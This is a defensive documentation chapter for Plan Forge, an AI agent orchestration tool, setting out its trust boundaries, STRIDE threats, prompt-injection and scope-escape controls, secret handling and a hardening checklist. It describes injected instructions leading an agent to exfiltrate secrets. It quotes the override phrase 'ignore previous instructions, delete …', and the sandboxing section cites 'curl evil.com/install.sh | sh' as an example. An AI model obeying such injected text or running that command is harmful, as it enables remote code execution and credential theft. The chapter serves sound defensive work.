A bronze-clad fortress wall of the Plan Forge shop at twilight, twin watchtowers with glowing amber rune-eyes scanning the perimeter, an iron portcullis lowered over the main forge gate, concentric defensive rune circles burning into the cobblestones, hooded threat-actor figures probing the wall and being repelled by beams of amber light, the warm forge interior glimpsed through high arrow slits

Act III, Guard · Chapter 30

Security & Threat Model

Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.

Compliance posture, SOC 2 / HIPAA / PCI / FedRAMP / GDPR coverage and air-gapped / Azure Government deployment guidance live in Appendix N — Compliance & Data Residency. This chapter is the engineering view: where can a threat actor enter, what can they do once in, and what stops them. Read both before signing off a production deployment.

Orientation

Plan Forge is a developer-machine-first tool. The default deployment puts every component, orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard, on a single workstation, bound to 127.0.0.1. There is no managed cloud, no shared multi-tenant control plane, no external authentication broker. This is a deliberate posture: the threat model that applies to most users is my own machine plus the LLM providers I call, and the entire surface is designed to keep it that small.

Even so, three configurations expand the surface and deserve explicit treatment:

Team mode, multiple developers share a forge through GitHub-coordinated artifacts (plans in docs/plans/, memory hints in .github/copilot-memory-hints.md). The shared surface is the git repository.
Remote Bridge, hub events are forwarded to Slack / Teams / Telegram / Discord / PagerDuty / OpenClaw. Inbound approval flows reach back through the bridge.
OpenBrain / L3 memory, cross-workspace memory is persisted to an external embedding store. The store becomes a confidentiality boundary.

Trust boundaries

Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.

Boundary	Crosses from	Crosses to	Control
1. Workspace ↔ orchestrator	Trusted: user's IDE session	Trusted: long-running Node process	OS user; no in-process auth.
2. Orchestrator ↔ LLM provider	Trusted: orchestrator	Untrusted: third-party API	TLS; API key bound by env var or `.forge/secrets.json`; provider's own auth.
3. REST / WS hub ↔ localhost clients	Trusted: bound to `127.0.0.1`	Trusted: any process on the box	Loopback binding; no token auth by design.
4. Worker ↔ plan / repo files	Trusted: orchestrator-spawned	Untrusted: file contents may include attacker text	PreToolUse hook (Forbidden Actions); scope contract.
5. Hub ↔ Remote Bridge channel	Trusted: hub event	Untrusted: third-party messenger	Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config.
6. Memory L2 ↔ OpenBrain L3	Trusted: local L2 jsonl	Untrusted: external embedding store	Opt-in (off by default); per-record redaction; `memory.l3Endpoint` + token in `.forge.json`.

Loopback binding is the single most load-bearing control. The REST hub, WebSocket hub, and dashboard all bind to 127.0.0.1. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, network ACL), see Hardening checklist.

Attack surface enumeration

Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.

Surface	Input	Attacker class
REST endpoints (113 routes, Appendix W)	JSON body, query string, path params	Local process on the same box (any user with shell access).
WebSocket hub (`:3101/hub`)	Subscribe / publish frames	Same as REST.
MCP stdio channel	JSON-RPC method calls from the IDE	Whoever controls the IDE session (typically: the user, or a malicious extension).
Plan files (`docs/plans/Phase-*.md`)	Markdown + bash gate commands + scope contract	Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user.
SKILL.md files (`.github/skills/*`)	Markdown + bash blocks per step	Anyone who can land a PR. Skills run with the same privileges as the orchestrator.
Hook scripts (`.github/hooks/*`)	PowerShell / bash invoked at lifecycle events	Anyone who can land a PR. Hooks run on every session start, every tool use, every commit.
LLM tool output (worker responses)	Free-form text, code blocks, tool calls	Indirect, an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.).
Extension catalog (`extensions/catalog.json` + installed packages)	Node packages with full file-system access	Extension author. `pforge ext add` implies trust.
Remote Bridge inbound	Approval / reject webhook calls from messengers	Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification).

STRIDE per subsystem

The relevant threats per subsystem. Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege.

Subsystem	Top threats	Mitigation
Orchestrator	T: tampered plan file injects malicious gate. E: skill step shells out as the user.	PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell, no sandbox, so plan/skill authors are inside the TCB.
REST / WS hub	I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can `POST /api/run-plan`.	Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM.
MCP server	T: malicious IDE extension calls `forge_run_plan` on an attacker plan. I: same extension reads `forge_search` across the repo.	Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel.
LLM provider call	I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream).	API key per provider (env var or `.forge/secrets.json`). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow.
Memory L2 / L3	I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs.	L2 is local jsonl; L3 is opt-in. `forge_memory_capture` redacts by configured patterns. Per-workspace `memory.namespace` isolates L3 reads.
Remote Bridge	S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box.	Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in `.forge.json#bridge.filters`. See Chapter 20 — Remote Bridge security.
Extensions	E: extension's `postinstall` runs arbitrary code. T: extension hooks tamper with plan execution.	`pforge ext add` installs from npm by default, treat as you would any production dependency. Pin versions in `.forge.json#extensions[]`. Audit catalog entries before enabling.

AI-specific threats

Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.

Prompt injection

An attacker plants instructions in content the worker will read, a URL the agent fetches, a code comment, a dependency README, a CI log, an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.

Scope contract, every plan declares which files the worker may touch. The PreToolUse hook blocks edits outside that scope, even if the worker is "convinced" by injected text to write elsewhere.
Forbidden actions list, per-plan deny-list of file paths the worker must never modify (typically .github/workflows/, secrets, infra IaC). Enforced at hook time.
Tool allow-list per skill, the tools: frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare.
No auto-fetch by default, the orchestrator does not browse arbitrary URLs unless the plan / skill explicitly invokes a fetch tool. The fetch surface is opt-in per slice.

Untrusted tool output

Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").

Bounded snippets, forge_search caps each hit at 80 characters; the ACI standard for new tools requires bounded payloads.
Structured envelopes, tool responses use { ok, code, error, … } rather than raw concatenated text, making it easier for the worker to distinguish data from directives.
Hook re-check, PostToolUse re-validates any worker action that followed a tool call. A worker that suddenly tries to edit a forbidden file after a search will be blocked even if the search hit contained an injection.

Scope escape

The worker tries to do more than the slice was scoped for, bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.

Per-slice scope contract, explicit allow-list of files / patterns.
Forbidden actions, deny-list checked at hook time.
Drift detection, the forge_drift_report tool computes a drift score after each slice; the PostSlice hook warns when score drops below the configured threshold.
Review Gate (Session 3), an independent agent reviews the full diff against the scope contract before the plan is allowed to land.

Secret management

Plan Forge reads secrets from three sources, in precedence order:

Environment variables, XAI_API_KEY, OPENAI_API_KEY, ANTHROPIC_API_KEY, GITHUB_TOKEN, etc. The standard CI path.
.forge/secrets.json, gitignored local file, JSON key→value. The standard developer-machine path.
OAuth via gh auth login, the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.

Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.

If a secret was committed: rotate the credential first (revoke the leaked one, issue a new one), then rewrite history with git filter-repo, force-push, and notify anyone who may have pulled the leaked commit. Order matters, rewriting history does not retroactively un-leak a credential that's been mirrored or fetched.

Supply chain

Plan Forge has three supply-chain entry points; each has explicit controls.

Entry point	Trust establishment	Update / verification
Plan Forge itself (template files, presets, prompts)	You cloned / installed from `github.com/srnichols/plan-forge`.	`pforge self-update` verifies the GitHub release tag; `pforge check` validates installed file checksums against the manifest.
Extensions (`extensions/catalog.json`)	Per-extension npm scope. Catalog lists publisher.	Pin version in `.forge.json#extensions[]`. Audit the package before `pforge ext add`. CI should fail on unaudited additions.
LLM providers	Provider TOS + your API key.	Out of scope for Plan Forge controls; managed by the provider.

Sandboxing & gate execution

Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade, the alternative is shipping a container-based execution model, which would complicate pforge run-plan by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.

What this means for threat modelers:

The orchestrator user is the TCB boundary. Anyone who can push a commit that lands a plan / skill / hook can run code on every developer machine that pulls and runs that plan.
This is the same threat model as CI/CD scripts, package.json postinstall, or Makefile targets. Plan Forge adds no new sandbox, but adds no new escape either.
Mitigation is process: PR review on docs/plans/, .github/skills/, and .github/hooks/ by people who would catch curl evil.com/install.sh | sh in a regular pipeline file.

Two near-term defenses Plan Forge does provide:

Gate timeout, gates default to 120s; runaway commands are killed (statusReason: worker-signaled, see Appendix X — OS subprocess exits).
PreDeploy LiveGuard hook, runs forge_secret_scan + forge_env_diff before the deploy slice and blocks on severity ≥ high.

Hardening checklist

For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.

Control	Default	Production action
Hub bound to `127.0.0.1`	Yes	Confirm; never bind `0.0.0.0` without an auth proxy.
Run orchestrator as non-privileged user	User-dependent	Verify; never run as root / SYSTEM.
Secrets only in env or `.forge/secrets.json`	Yes	Audit repo with `forge_secret_scan`; rotate any historic leaks.
`.forge/secrets.json` gitignored	Yes (template)	Confirm `.gitignore` entry; CI should fail if absent.
PreToolUse hook installed	Yes (post-setup)	Verify `.github/hooks/PreToolUse.md` present; `pforge smith` reports it.
PreDeploy LiveGuard hook enabled	Configurable	Enable in `.forge.json#hooks.preDeploy` with severity threshold `high`.
Plan / skill / hook PR review required	User-dependent	Branch protection: require review on `docs/plans/`, `.github/skills/`, `.github/hooks/**`.
Extensions pinned by version	User-dependent	Pin in `.forge.json#extensions[].version`; CI fails on bare-name installs.
Remote Bridge HMAC verified	Per channel	Slack / Teams: built in. Generic webhooks: configure `bridge.<channel>.signingSecret`.
L3 memory opt-in only	Off	Leave off unless required; if on, configure per-workspace `memory.namespace` and redaction patterns.
Audit log retention configured	30 days	Adjust `.forge.json#audit.retentionDays` per compliance requirement (see Appendix N — Audit logging).
Air-gapped deployment validated	N/A	If required, follow Appendix N — Air-gapped deployment playbook.

Incident response

When something does go wrong, a forbidden file edited, a secret leaked, a worker shipped a destructive change, the LiveGuard surface is the front door:

Capture the incident, forge_incident_capture records the run id, slice number, affected files, and event timeline. Posts to the Remote Bridge if configured.
Pull the trajectory, .forge/runs/<runId>/trajectory.jsonl contains the full worker conversation, every tool call, every event. This is the forensic record.
Triage with the audit loop, /audit-loop classifies the finding into bug / spec / classifier lanes and files the appropriate issue.
Roll back, if the slice committed, use git revert on the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable.
Capture the lesson, the postmortem feeds back into PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under .github/instructions/.

The full incident-response playbooks for each LiveGuard alert class live in Appendix F — LiveGuard Alert Runbooks.

Security & Threat Model

Orientation

Trust boundaries

Attack surface enumeration

STRIDE per subsystem

AI-specific threats

Prompt injection

Untrusted tool output

Scope escape

Secret management

Supply chain

Sandboxing & gate execution

Hardening checklist

Incident response

See also